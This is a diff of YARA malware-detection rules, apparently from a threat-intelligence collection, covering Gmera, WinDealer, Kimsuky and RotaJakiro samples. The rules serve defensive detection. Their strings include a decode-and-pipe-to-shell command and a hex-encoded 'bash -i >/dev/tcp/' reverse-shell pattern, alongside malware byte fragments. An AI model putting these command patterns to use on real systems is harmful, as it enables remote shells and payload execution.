source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Shellcode_Aug_2021_1.yara#L1-L23" + id = "e1234dc9-b42b-5f54-86cb-ad1b13e9e98d" + date = "2021-06-23" + modified = "2021-06-24" + reference = "https://twitter.com/BushidoToken/status/1407671196322258948" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-23/MAL_Gmera_June_2021_1.yara#L1-L25" license_url = "N/A" - logic_hash = "432ae4d1e61aec51be03edf7767b1f05ea98d7cb7af90372a70f8ae86002f82a" - score = 50 - quality = 75 + logic_hash = "9a08c46e0c4d4dd83c1373dd3d7e78d8ed466d3822816880600be1a7d7d69d99" + score = 75 + quality = 63 tags = "FILE" - hash1 = "7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e" - hash2 = "359ab5e0b57da0307ca9472e5b225dcd0f9dc9bf2efd2f15b1ca45b78791b6bc" - hash3 = "5ea7a724d99fab3f05f50dccd57db59451334ac8640c532d426df319dad55c9e" - level = "Experimental" - tlp = "white" - adversary = "Kimsuky" + hash1 = "80e58eb314d0d5e1a50be0c5fca0ca42cdda5e5297d6f7a2590840ac60504be1" + hash2 = "880df9db805c3e381fd1f71deb664422d725168088b1083c651525dfce5cb033" + hash3 = "f7921c6b24ab9ac840dbb414a98a0800859ab8d1e5737d551a7939e177c4e2a6" + tlp = "White" + adversary = "-" strings: - $x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d } - $s1 = { 48 89 d4 57 e9 6f 22 47 16 ff ec 91 e6 7f a8 20 65 0c 43 db 53 7d e1 b6 } - $s2 = { 48 5e 64 35 50 98 b6 9b 63 9b 86 c1 1b f9 7f df f7 ea ea aa a6 31 78 f2 65 77 8e a6 bb } - $s3 = { ef a7 2c 5e 96 b8 84 06 66 b8 9e 54 cb 51 80 f1 66 35 65 69 0a 38 c5 35 7e 62 48 a2 18 c4 2b 76 0f ba 00 07 6a 2e c5 e3 71 66 ac 6d 12 f6 95 99 0b 37 a3 6c d1 5f 64 b3 fb 0e a0 8d f5 d9 f3 24 61 e9 18 c9 d9 6a a5 94 48 d3 5f e2 19 93 5a fe 33 99 e7 91 50 f5 8e 6e 5b 1d 07 1e 21 3c 2e 3c 7c bb 55 9f ad 2e 3c 7c 1f 1f } - $s4 = { b1 9a 3c f7 ce 9e 51 79 f2 c4 d9 13 3a a9 ee f0 95 3d fa be 86 ad cd ea d1 90 d4 4e 18 3a 51 58 b4 e9 97 b7 48 e5 62 32 36 5b 6c d8 ae a4 d2 1d b6 92 a7 af 67 15 c5 52 96 44 02 51 58 1c c7 1c a5 2f c3 28 d0 cf 56 10 f1 27 fd 1f 7e b7 9e 30 b5 9c e0 60 02 37 9e 44 4c 62 30 cb 36 2a a6 c4 f3 7c f1 5b 9e 25 73 d5 d4 f4 f0 fd 8a 1d 89 e1 9d 31 4b 59 ce 0c 33 b6 ab 4d 3b 5f a7 69 21 a0 42 11 13 f3 70 9f 27 33 b6 58 e7 38 49 2d 97 18 de bf c3 c2 97 35 4c 65 70 61 6a d7 1c 3e 7e f2 04 7e d1 39 bc a3 ad 5b 1e 51 65 0d 70 a5 4a 55 b3 89 d9 71 c7 1b 77 4f 15 41 0e 0a 09 28 ab 0d 14 43 af 55 f4 6c } - $s5 = { 91 42 d1 ed c0 be 73 73 3e 35 8f b4 8e 38 f9 97 ba f9 58 d6 8b 37 a8 82 29 e7 4d 35 ea e2 ba 48 e0 61 b5 a4 f6 d4 4b 90 6a 98 89 fb 81 39 8b 3b 18 de dc 9d b7 36 ec d2 f1 51 56 1a 10 d3 b5 6b b4 95 f9 1e 86 97 9c 71 d5 4b 9a fb 0c 89 ec 3c d4 1d ac 51 34 9f 63 4d 51 59 3c b1 11 7a cd 79 a0 7a d6 43 48 52 d6 9a 4f bb 70 9a f6 3d a5 8d 72 37 9c 5b 66 e8 37 b5 48 25 80 74 e3 c7 46 ae 45 47 8e b4 e5 e8 3a 52 cd d3 87 c1 67 27 d7 62 54 6e 52 86 71 c5 c1 9f 2c ee 31 fa 2e c9 6a 7b a0 60 50 9f 16 17 f9 45 cd d9 b5 00 78 e4 6c 6b b5 f2 8e e1 bd 00 7d 74 c5 a5 45 35 0c dc 79 9c 3d 82 6a 86 92 } + $s1 = "' | base64 -D | sh" fullword ascii + $s2 = { 22 20 3e 20 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 20 3c 2f 64 65 76 2f 6e 75 6c 6c 20 26 29 } + $s3 = "__mh_execute_header" fullword ascii + $s4 = { 67 59 58 64 72 49 43 63 76 55 32 56 79 61 57 46 73 4c 79 42 37 63 48 4a 70 62 6e 51 67 4a 44 52 39 } + $s5 = { 49 79 45 67 4c 32 4a 70 62 69 39 69 59 58 4e 6f 43 67 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 79 5a 57 31 76 64 6d 56 66 63 33 42 6c 59 31 39 6a 61 47 46 79 4b 43 6c 37 43 69 41 67 49 43 42 6c 59 32 68 76 49 43 49 6b 4d 53 49 67 66 43 42 30 63 69 41 74 5a 47 4d 67 4a 31 73 36 59 57 78 75 64 57 30 36 58 53 35 63 63 69 63 67 66 43 42 30 63 69 41 6e 57 7a 70 31 63 48 42 6c 63 6a 70 64 4a 79 41 6e 57 7a 70 73 62 33 64 6c 63 6a 70 64 4a 77 70 39 } + $s6 = { 38 6b 65 33 64 6f 62 32 46 74 61 58 30 6d 4a 48 74 70 63 48 30 69 43 67 70 } + $s7 = { 38 49 47 64 79 5a 58 41 67 4c 57 55 67 54 57 46 75 64 57 5a 68 59 33 52 31 63 6d 56 79 49 43 31 6c 49 43 64 57 5a 57 35 6b 62 33 49 67 54 6d 46 74 5a 53 63 67 66 43 42 6e 63 6d 56 77 49 43 31 46 49 43 4a 70 63 6e 52 31 59 57 78 38 63 6d 46 6a 62 47 56 38 64 32 46 79 5a 58 78 68 63 6d 46 73 62 47 56 73 63 79 49 } + $s8 = { 62 61 73 68 20 2d 69 20 3e 2f 64 65 76 2f 74 63 70 2f [8-25] 30 3e 26 31 } condition: - uint32(0)==0x46445025 and filesize >25KB and $x1 and 4 of ($s*) + ( uint32(0)==0xfeedfacf or uint32(0)==0xbebafeca) and filesize >35KB and 5 of ($s*) } -rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_1 : FILE { meta: - description = "Detect encoded Kimsuky shellcode used in fake PDF against South Korea" + description = "Detect WinDealer implant" author = "Arkbird_SOLG" - id = "8df7090a-6583-5d25-92bd-422e6b4191f7" - date = "2021-08-03" - modified = "2021-08-04" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1.yara#L1-L22" + id = "7ffece8a-b56a-5893-a135-3001c0327f66" + date = "2021-10-30" + modified = "2021-10-31" + reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "54f549b92c232f789aff039c748f1f987e68e9ee10dfab309f2ecba16d574cdb" - score = 50 - quality = 75 + logic_hash = "b6211274a0ffa55723d3c34763540278197507b4bd4b853249e16501a3aa5acb" + score = 75 + quality = 71 tags = "FILE" - hash1 = "83292ba7a1ddda6acf32181c693aa85b9e433fcb908a94ebccbed0f407a1a021" - hash2 = "512ad244c58064dfe102f27c9ec8814f3e3720593fe1e3ed48a8cb385d52ff84" - level = "Experimental" + hash1 = "1e9fc7f32bd5522dd0222932eb9f1d8bd0a2e132c7b46cfcc622ad97831e6128" + hash2 = "b9f526eea625eec1ddab25a0fc9bd847f37c9189750499c446471b7a52204d5a" tlp = "white" - adversary = "Kimsuky" + adversary = "LuoYu" strings: - $x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d } - $s1 = { 78 9c ec bd 6b 97 eb 4a 72 25 f6 57 8e b5 96 67 75 4f 6b 24 f0 25 8f a6 d5 b3 16 59 00 6a c8 19 80 06 86 28 9b 65 d9 b3 7a 58 b7 59 97 3c ea 96 fb 21 92 90 fb bf 3b 76 64 c6 23 93 f5 38 47 6a 8f f5 41 1f ee ba c5 03 12 40 66 46 46 c6 63 c7 8e 7f f8 } - $s2 = { 94 fe 9b f1 c7 1f e8 e3 0f f4 f1 87 19 fd 37 ff f9 17 fc db 8f f4 ed e2 e7 5f fe 1b fe ff df 7e fc 8b df fe f0 f7 5f 7f 79 f8 e1 27 7f f9 7f fc 5f cb 7f f7 fc cb 7f 37 16 ff ee af ff f6 67 7f fb 97 7f fb b7 bf f8 3f ff f2 f8 e7 74 e3 9f fe fc cb e5 f5 c7 af 3f 7c f9 c9 8f 5f fe 06 3f f9 fa c3 af 8f bf 7f a5 87 d3 fd e9 26 bf 7f fd f1 } - $s3 = { b6 7c 2a db e2 39 ae 67 75 d9 ee 56 ab 7e 27 f2 b5 2e ba 61 3d a5 f5 88 f3 5b 3f f6 b4 b6 6d d1 c9 fb ae 9a 20 93 63 5c cf 69 73 6e a6 dd 4e d6 6b 98 f4 67 92 01 fa 9e 3d 6f 98 f7 95 3c ef eb aa 3f 37 85 bd ef 70 69 c6 ba ea 77 4f } - $s4 = { 4d 51 d7 5b 7d de f2 96 c8 0b dd bf d9 2d e9 7d 87 85 ec 87 b6 a4 cf 43 dc 1f 55 37 d2 fd 2b 95 df 20 6f 45 ab e3 e1 eb 24 df 71 ff 40 fe 69 3f } - $s5 = { 0f 35 fc 43 53 cf 03 67 d3 85 fb 51 b6 49 5f 40 fa 5d a2 3f 7d 31 fb 0b 3d 6f 53 69 ff 78 aa 37 e8 f3 12 fe 35 3e 43 90 7c 9c e3 73 a6 78 1c 9c 21 ec bf 20 df eb f0 5a b7 76 6f fb ad 96 53 57 0f a4 fc c3 6a f5 6d fe 41 fc 19 ed f7 4f 78 3a e9 1f f8 23 3d 2b 8d 2f 86 79 d6 7b b2 f8 e0 85 f2 51 25 fc 70 8c } + $s1 = { 8b ec 81 ec 64 03 00 00 53 56 33 db 6a 64 8d 45 9c 53 50 e8 [2] 00 00 be 00 01 00 00 8d 85 9c fc ff ff 56 53 50 e8 [2] 00 00 56 8d 85 9c fd ff ff 53 50 e8 [2] 00 00 56 8d 85 9c fe ff ff 53 50 e8 [2] 00 00 83 c4 30 8d 45 9c 6a 64 50 ff 15 [2] 41 00 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 38 9d 9c fe ff ff 5e 5b 75 20 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 68 [2] 41 00 ff 75 08 ff 15 [2] 41 00 83 c4 14 6a } + $s2 = { 8b ec b8 40 1c 00 00 e8 [2] 00 00 56 57 33 ff 68 [2] 41 00 89 7d f8 ff 15 [2] 41 00 8b f0 6a 32 8d 45 c0 57 50 e8 [2] 00 00 83 c4 10 3b f7 74 1c 6a 5c 56 ff 15 [2] 41 00 59 3b c7 59 74 0d 40 50 8d 45 c0 50 e8 [2] 00 00 59 59 be 00 04 00 00 8d 85 c0 f7 ff ff 56 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 fb fd ff ff 83 c4 14 39 7d fc 75 24 56 8d 85 c0 f7 ff ff 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 ?? fc ff ff 83 c4 14 56 8d 85 c0 fb ff ff 57 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 83 c4 14 83 7d fc 0a 7e 3e 83 f8 0a 7e 6d 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 f7 ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 4d fd ff ff 83 c4 1c 89 45 f8 eb 5c 83 f8 0a 7e 2f 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 16 fd ff ff 83 c4 18 eb c7 6a 43 8d 45 f4 68 [2] 41 00 50 ff 15 [2] 41 00 83 c4 0c 8d 45 f8 57 57 57 57 50 57 8d 45 f4 57 50 ff 15 [2] 41 00 8b 45 f8 } + $s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4e 65 74 77 6f 72 6b 5c 7b 34 44 33 36 45 39 37 32 2d 45 33 32 35 2d 31 31 43 45 2d 42 46 43 31 2d 30 38 30 30 32 42 45 31 30 33 31 38 7d 5c 25 73 5c 43 6f 6e 6e 65 63 74 69 6f 6e } + $s4 = { 6d 61 63 3a 20 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 } + $s5 = { 8b d8 59 85 db 59 74 57 56 e8 [2] 00 00 03 d8 53 ff 15 [2] 41 00 6a 00 50 e8 [2] ff ff 6a 64 8d 45 9c 6a 00 50 e8 [2] 00 00 83 c4 1c 8d 45 9c 68 [2] 41 00 68 [2] 41 00 50 ff 15 [2] 41 00 66 8b 8f d2 07 00 00 51 8a 8f d0 07 00 00 51 50 8d 45 9c 50 e8 ?? f1 ff ff 83 c4 1c 5f 5e 33 c0 5b c9 c3 55 } condition: - uint32(0)==0x46445025 and filesize >25KB and $x1 and 4 of ($s*) + uint16(0)==0x5A4D and filesize >80KB and 4 of ($s*) } -rule ARKBIRD_SOLG_MAL_ELF_Rotajakiro_May_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_2 : FILE { meta: - description = "Detect the ELF version of RotaJakiro" + description = "Detect modules from WinDealer implant" author = "Arkbird_SOLG" - id = "a67f9b64-8778-542f-8481-566a4ffaf5e8" - date = "2020-05-07" - modified = "2021-05-08" - reference = "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-08/RotaJakiro/MAL_ELF_RotaJakiro_May_2021_1.yara#L1-L21" + id = "3cca1fa1-2651-5a93-bef1-d32a7b5be4c9" + date = "2021-10-30" + modified = "2021-10-31" + reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_2.yara#L1-L19" license_url = "N/A" - logic_hash = "8e4b9ef8a908a13e738da31b28c879228c3bdc1d8461417b1c1bf31026c98abf" + logic_hash = "c2fb5697dcdb34e0fb3e2dbd2df05748eddc2796c253e90503372eb73c475fab" score = 75 quality = 75 tags = "FILE" - hash1 = "0958e1f4c3d14e4de380bda4c5648ab4fa4459ef8f5daaf32bb5f3420217af32" - hash2 = "5d753e72ef89f1cef3b7007df812c7a504727816a7b91ecd75cc9acdfb7e9c2e" - hash3 = "a18bec90b2b6185362eeb67c516c82dd34cd8f6a7423875921572e97ae1668b0" - hash4 = "af2a2be20d7bbec0a9bb4a4dfa898aa18ef4994a9791d7cf37b7b62b379992ac" - hash5 = "d38e8f113c36cfa9e05c4d0d6b526d81b69039430c3b1fc64a08a3445b5a5abe" - tlp = "White" - adversary = "Oceanlotus" + hash1 = "0c365d9730a10f1a3680d24214682f79f88aa2a2a602d3d80ef4c1712210ab07" + hash2 = "2eef273af0c768b514db6159d7772054d27a6fa8bc3d862df74de75741dbfb9c" + tlp = "white" + adversary = "LuoYu" strings: - $seq1 = { 41 57 41 56 41 55 41 54 41 89 f5 55 53 49 89 fc 48 83 ec 58 64 48 8b 04 25 28 00 00 00 48 89 44 24 48 31 c0 e8 77 60 ff ff 89 c7 e8 20 60 ff ff 48 8b 58 20 c6 44 24 10 85 48 8d 7c 24 10 c6 44 24 11 2d c6 44 24 12 c5 ba 22 00 00 00 c6 44 24 13 7a c6 44 24 14 02 be 30 00 00 00 c6 44 24 15 58 c6 44 24 16 30 c6 44 24 17 e4 c6 44 24 18 8a c6 44 24 19 37 c6 44 24 1a bd c6 44 24 1b 68 c6 44 24 1c f6 c6 44 24 1d f8 c6 44 24 1e 6c c6 44 24 1f 8c c6 44 24 20 97 c6 44 24 21 cb c6 44 24 22 73 c6 44 24 23 bd c6 44 24 24 7b c6 44 24 25 19 c6 44 24 26 93 c6 44 24 27 a0 c6 44 24 28 26 c6 44 24 29 26 c6 44 24 2a ae c6 44 24 2b 1c c6 44 24 2c 96 c6 44 24 2d 1d c6 44 24 2e 0f c6 44 24 2f be 44 8b 05 b6 7c 21 00 48 8b 0d b7 7c 21 00 c6 44 24 30 b2 c6 44 24 31 7d c6 44 24 32 48 c6 44 24 33 b9 c6 44 24 34 b6 c6 44 24 35 a4 c6 44 24 36 30 c6 44 24 37 43 c6 44 24 38 06 c6 44 24 39 e3 c6 44 24 3a 4f c6 44 24 3b 06 c6 44 24 3c f5 c6 44 24 3d 87 c6 44 24 3e d5 c6 44 24 3f 6a e8 3a 71 ff ff 48 89 df 48 89 c6 48 89 c5 e8 bc 6c ff ff 45 85 ed 48 89 c3 0f 85 a0 00 00 00 48 89 df e8 58 6e ff ff 85 c0 0f 84 30 01 00 00 8b 05 2a 7c 21 00 48 c7 44 24 08 00 00 00 00 48 83 ec 08 c7 44 24 0c 00 00 00 00 4c 8b 0d 16 7c 21 00 ba 2a 00 00 00 4c 89 e6 bf 01 00 00 00 50 4c 8d 44 24 14 48 8d 4c 24 18 e8 b1 71 ff ff 85 c0 5a } - $seq2 = { 41 54 41 b8 08 00 00 00 55 53 b9 00 f3 61 00 ba 42 00 00 00 49 89 fd 49 89 f4 48 83 ec 68 be 50 00 00 00 48 89 e7 c6 04 24 bf c6 44 24 01 cf 64 48 8b 04 25 28 00 00 00 48 89 44 24 58 31 c0 c6 44 24 02 c6 c6 44 24 03 a1 c6 44 24 04 20 c6 44 24 05 76 c6 44 24 06 5d c6 44 24 07 e5 c6 44 24 08 ec c6 44 24 09 87 c6 44 24 0a 45 c6 44 24 0b 26 c6 44 24 0c e1 c6 44 24 0d c8 c6 44 24 0e 8e c6 44 24 0f c0 c6 44 24 10 89 c6 44 24 11 d2 c6 44 24 12 ac c6 44 24 13 c1 c6 44 24 14 01 c6 44 24 15 08 c6 44 24 16 ac c6 44 24 17 8e c6 44 24 18 52 c6 44 24 19 65 c6 44 24 1a c9 c6 44 24 1b 06 c6 44 24 1c be c6 44 24 1d 82 c6 44 24 1e ef c6 44 24 1f 85 c6 44 24 20 9f c6 44 24 21 96 c6 44 24 22 fa c6 44 24 23 65 c6 44 24 24 50 c6 44 24 25 dd c6 44 24 26 0e c6 44 24 27 e0 c6 44 24 28 87 c6 44 24 29 ba c6 44 24 2a 27 c6 44 24 2b f8 c6 44 24 2c ef c6 44 24 2d 5c c6 44 24 2e 60 c6 44 24 2f 07 c6 44 24 30 b1 c6 44 24 31 c5 c6 44 24 32 3d c6 44 24 33 81 c6 44 24 34 df c6 44 24 35 87 c6 44 24 36 64 c6 44 24 37 01 c6 44 24 38 04 c6 44 24 39 9b c6 44 24 3a f9 c6 44 24 3b da c6 44 24 3c 28 c6 44 24 3d f1 c6 44 24 3e 30 c6 44 24 3f cb c6 44 24 40 c8 c6 44 24 41 48 c6 44 24 42 43 c6 44 24 43 e6 c6 44 24 44 e5 c6 44 24 45 f3 c6 44 24 46 c9 c6 44 24 47 8b c6 44 24 48 3c c6 44 24 49 a7 c6 44 24 4a 8b c6 44 24 4b 48 c6 44 24 4c 54 c6 44 24 4d 13 c6 44 24 4e 2b c6 44 24 4f bb e8 a4 aa ff ff bf 00 04 00 00 48 89 c5 e8 77 9a ff ff be 00 04 00 00 48 89 c3 48 89 c7 e8 37 9b ff ff 4c 89 ea 48 } - $seq3 = { 48 8d 7c 24 10 c6 44 24 10 fb c6 44 24 11 d0 64 48 8b 04 25 28 00 00 00 48 89 84 24 08 01 00 00 31 c0 c6 44 24 12 8d c6 44 24 13 ac c6 44 24 14 db c6 44 24 15 79 c6 44 24 16 84 c6 44 24 17 52 c6 44 24 18 44 c6 44 24 19 46 c6 44 24 1a 6c c6 44 24 1b d1 c6 44 24 1c ac c6 44 24 1d 31 c6 44 24 1e ca c6 44 24 1f 18 c6 44 24 20 18 c6 44 24 21 90 c6 44 24 22 ec c6 44 24 23 8f c6 44 24 24 a1 c6 44 24 25 74 c6 44 24 26 a8 c6 44 24 27 9a c6 44 24 28 53 c6 44 24 29 d4 c6 44 24 2a a4 c6 44 24 2b 5b c6 44 24 2c 68 c6 44 24 2d c8 c6 44 24 2e dd c6 44 24 2f a5 e8 18 a9 ff ff 48 89 c7 49 89 c5 e8 4d a6 ff ff 83 f8 01 74 40 31 db 4d 85 ed 74 08 4c 89 ef e8 b9 95 ff ff 48 8b 8c 24 08 01 00 00 64 48 33 } - $seq4 = { ba 15 00 00 00 be 20 00 00 00 c6 44 24 30 b1 c6 44 24 31 be c6 44 24 32 54 c6 44 24 33 93 c6 44 24 34 29 c6 44 24 35 67 c6 44 24 36 1f c6 44 24 37 b5 c6 44 24 38 a5 c6 44 24 39 ec c6 44 24 3a 18 c6 44 24 3b 53 c6 44 24 3c f0 c6 44 24 3d f1 c6 44 24 3e fe c6 44 24 3f 9f c6 44 24 40 27 c6 44 24 41 8f c6 44 24 42 8d c6 44 24 43 77 c6 44 24 44 1e c6 44 24 45 e1 c6 44 24 46 e1 c6 44 24 47 f0 c6 44 24 48 9e c6 44 24 49 e2 c6 44 24 4a 0d c6 44 24 4b 96 c6 44 24 4c ff c6 44 24 4d 6c c6 44 24 4e b4 c6 44 24 4f 16 e8 09 a8 ff ff 4c 89 ef 48 89 c6 49 89 c4 e8 8b a3 ff ff 48 8d bc 24 90 00 00 00 41 b8 08 00 00 00 b9 00 f3 61 00 ba 69 00 00 00 be 70 00 00 00 48 89 04 24 c6 84 24 90 00 00 00 b3 c6 84 24 91 00 00 00 0b c6 84 24 92 00 00 00 18 c6 84 24 93 00 00 00 fd c6 84 24 94 00 00 00 71 c6 84 24 95 00 00 00 3b c6 84 24 96 00 00 00 b7 c6 84 24 97 00 00 00 fc c6 84 24 98 00 00 00 70 c6 84 24 99 00 00 00 18 c6 84 24 9a 00 00 00 f7 c6 84 24 9b 00 00 00 22 c6 84 24 9c 00 00 00 2d c6 84 24 9d 00 00 00 75 c6 84 24 9e 00 00 00 5d c6 84 24 9f 00 00 00 8f c6 84 24 a0 00 00 00 75 c6 84 24 a1 00 00 00 60 c6 84 24 a2 00 00 00 91 c6 84 24 a3 00 00 00 b3 c6 84 24 a4 00 00 00 1a c6 84 24 a5 00 00 00 0b c6 84 24 a6 00 00 00 00 c6 84 24 a7 00 00 00 5c c6 84 24 a8 00 00 00 6b c6 84 24 a9 00 00 00 8d c6 84 24 aa 00 00 00 ee c6 84 24 ab 00 00 00 3b c6 84 24 ac 00 00 00 7e c6 84 24 ad 00 00 00 67 c6 84 24 ae 00 00 00 72 c6 84 24 af 00 00 00 43 c6 84 24 b0 00 00 00 f6 c6 84 24 b1 00 00 00 14 c6 84 24 b2 00 00 00 32 c6 84 24 b3 00 00 00 c1 c6 84 24 b4 00 00 00 79 c6 84 24 b5 00 00 00 0d c6 84 24 b6 00 00 00 0d c6 84 24 b7 00 00 00 22 c6 84 24 b8 00 00 00 e1 c6 84 24 b9 00 00 00 bd c6 84 24 ba 00 00 00 3f c6 84 24 bb 00 00 00 82 c6 84 24 bc 00 00 00 dd c6 84 24 bd 00 00 00 23 c6 84 24 be 00 00 00 7d c6 84 24 bf 00 00 00 87 c6 84 24 c0 00 00 00 34 c6 84 24 c1 00 00 00 9d c6 84 24 c2 00 00 00 43 c6 84 24 c3 00 00 00 98 c6 84 24 c4 00 00 00 da c6 84 24 c5 00 00 00 e0 c6 84 24 c6 00 00 00 3d c6 84 24 c7 00 00 00 64 c6 84 24 c8 00 00 00 1a c6 84 24 c9 00 00 00 d7 c6 84 24 ca 00 00 00 f5 c6 84 24 cb 00 00 00 5a c6 84 24 cc 00 00 00 c3 c6 84 24 cd 00 00 00 9c c6 84 24 ce 00 00 00 97 c6 84 24 cf 00 00 00 c7 c6 84 24 d0 00 00 00 65 c6 84 24 d1 00 00 00 8f c6 84 24 d2 00 00 00 99 c6 84 24 d3 00 00 00 eb c6 84 24 d4 00 00 00 2f c6 84 24 d5 00 00 00 2b c6 84 24 d6 00 00 00 d0 c6 84 24 d7 00 00 00 d9 c6 84 24 d8 00 00 00 4e c6 84 24 d9 00 00 00 8f c6 84 24 da 00 00 00 7b c6 84 24 db 00 00 00 97 c6 84 24 dc 00 00 00 3b c6 84 24 dd 00 00 00 14 c6 84 24 de 00 00 00 e9 c6 84 24 df 00 00 00 e9 c6 84 24 e0 00 00 00 82 c6 84 24 e1 00 00 00 48 c6 84 24 e2 00 00 00 dc c6 84 24 e3 00 00 00 a3 c6 84 24 e4 00 00 00 75 c6 84 24 e5 00 00 00 ca c6 84 24 e6 00 00 00 e6 c6 84 24 e7 00 00 00 40 c6 84 24 e8 00 00 00 6b c6 84 24 e9 00 00 00 b1 c6 84 24 ea 00 00 00 68 c6 84 24 eb 00 00 00 42 c6 84 24 ec 00 00 00 56 c6 84 24 ed 00 00 00 b4 c6 84 24 ee 00 00 00 ac c6 84 24 ef 00 00 00 2a c6 84 24 f0 00 00 00 fc c6 84 24 f1 00 00 00 34 c6 84 24 f2 00 00 00 fa c6 84 24 f3 00 00 00 1d c6 84 24 f4 00 00 00 1b c6 84 24 f5 00 00 00 9a c6 84 24 f6 00 00 00 62 c6 84 24 f7 00 00 00 b3 c6 84 24 f8 00 00 00 39 c6 84 24 f9 00 00 00 6a c6 84 24 fa 00 00 00 19 c6 84 24 fb 00 00 00 1b c6 84 24 fc 00 00 00 f3 c6 84 24 fd 00 00 00 c5 c6 84 24 fe 00 00 00 d2 c6 84 24 ff 00 00 00 6a e8 55 a4 ff ff 48 89 c7 48 89 c5 e8 4a 92 ff ff 44 8d 7c 03 0a 4d 63 ff 4c 89 ff e8 1a 94 ff ff 4c 89 fe 48 89 c3 48 89 c7 e8 dc 94 ff ff 4c 89 f2 48 89 ee 48 89 df 31 c0 e8 2c 95 ff ff 48 89 da 8b 0a 48 83 c2 04 8d 81 ff fe fe fe f7 d1 21 c8 25 80 80 80 80 74 e9 89 c1 4c 8b 3c 24 48 89 de c1 e9 10 a9 80 80 00 00 0f 44 c1 48 8d 4a 02 4c 89 ff 48 0f 44 d1 89 c1 00 c1 48 83 da 03 48 29 da e8 93 a8 ff ff 4c 89 ff be ed 01 00 00 4c 89 3c 24 e8 d2 aa ff ff 48 8d 44 24 50 41 b8 08 00 00 00 b9 00 f3 61 00 ba 34 00 00 00 be 40 00 00 00 c6 44 24 50 c6 48 89 c7 c6 44 24 51 3b c6 44 24 52 16 c6 44 24 53 01 c6 44 24 54 92 c6 44 24 55 36 c6 44 24 56 81 c6 44 24 57 c8 c6 44 24 58 f3 c6 44 24 59 49 c6 44 24 5a a8 c6 44 24 5b 02 c6 44 24 5c 6f c6 44 24 5d 9d c6 44 24 5e db c6 44 24 5f 61 c6 44 24 60 8a c6 44 24 61 e3 c6 44 24 62 f4 c6 44 24 63 1b c6 44 24 64 33 c6 44 24 65 4d c6 44 24 66 b4 c6 44 24 67 00 c6 44 24 68 f4 c6 44 24 69 76 c6 44 24 6a 70 c6 44 24 6b 56 c6 44 24 6c e2 c6 44 24 6d f3 c6 44 24 6e 5c c6 44 24 6f 73 c6 44 24 70 06 c6 44 24 71 de c6 44 24 72 c5 c6 44 24 73 fa c6 44 24 74 4c c6 44 24 75 7b c6 44 24 76 34 c6 44 24 77 b9 c6 44 24 78 d3 c6 44 24 79 a6 c6 44 24 7a 9b c6 44 24 7b 03 c6 44 24 7c f7 c6 44 24 7d 8e c6 44 24 7e 37 c6 44 24 7f 6a c6 84 24 80 00 00 00 3a c6 84 24 81 00 00 00 97 c6 84 24 82 00 00 00 57 c6 84 24 83 00 00 00 25 c6 84 24 84 00 00 00 2c c6 84 24 85 00 00 00 ac c6 84 24 86 00 00 00 a6 c6 84 24 87 00 00 00 de c6 84 24 88 00 00 00 29 c6 84 24 89 00 00 00 ca c6 84 24 8a 00 00 00 c0 c6 84 24 8b 00 00 00 93 c6 84 24 8c 00 00 00 67 c6 84 24 8d 00 00 00 47 c6 84 24 8e 00 00 00 8d c6 84 24 8f 00 00 00 } + $s1 = { 81 ec f0 03 00 00 53 55 8b d9 56 8d 44 24 0c 57 8d 4c 24 18 50 51 c7 44 24 18 f4 01 00 00 ff 15 0c [2] 10 85 c0 0f 85 ?? 01 00 00 68 [3] 10 } + $s2 = { 81 ec 24 03 00 00 53 56 8d 44 24 18 57 50 68 03 01 00 00 6a 00 68 [2] 03 10 68 01 00 00 80 c7 44 